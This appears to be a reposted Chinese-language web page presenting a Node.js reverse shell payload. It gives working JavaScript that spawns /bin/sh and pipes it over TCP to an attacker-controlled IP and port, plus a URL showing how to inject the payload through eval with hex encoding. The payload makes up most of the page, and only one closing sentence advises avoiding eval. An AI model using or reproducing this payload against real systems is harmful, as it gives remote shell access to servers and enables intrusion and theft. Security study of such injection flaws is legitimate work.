JavaScript反向shell

來源:互聯網
上載者:User

標籤:soc   小技巧   java   技巧   require   執行   避免   highlight   name   

Node.js反向Shell

摘自:http://www.itfang.net/?p=109

如下的Javascript就是一個Node.js的反向串連shell。

這個payload將會產生一個/bin/sh的shell,建立一個TCP串連到攻擊者的伺服器,並且在通訊資料流中綁定shell命令。

(function(){    var net = require("net"),        cp = require("child_process"),        sh = cp.spawn("/bin/sh", []);    var client = new net.Socket();    client.connect(8080, "10.17.26.64", function(){        client.pipe(sh.stdin);        sh.stdout.pipe(client);        sh.stderr.pipe(client);    });    return /a/; // Prevents the Node.js application form crashing})();

為了優雅的執行payload,我們還需要一些小技巧,我們將反向串連shell的payload用16進位進行編碼,然後再用Node.js的Buffer對象來對其進行解碼操作。

http://target.tld/?name=["./;eval(new Buffer(‘PAYLOAD‘, ‘hex‘).toString());//*"]

我們強烈的建議開發人員們避免在JavaScript項目中使用eval函數,而修複的方法也很簡單,直接使用RegExp對象來對資料進行操作即可。

JavaScript反向shell

相關文章

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.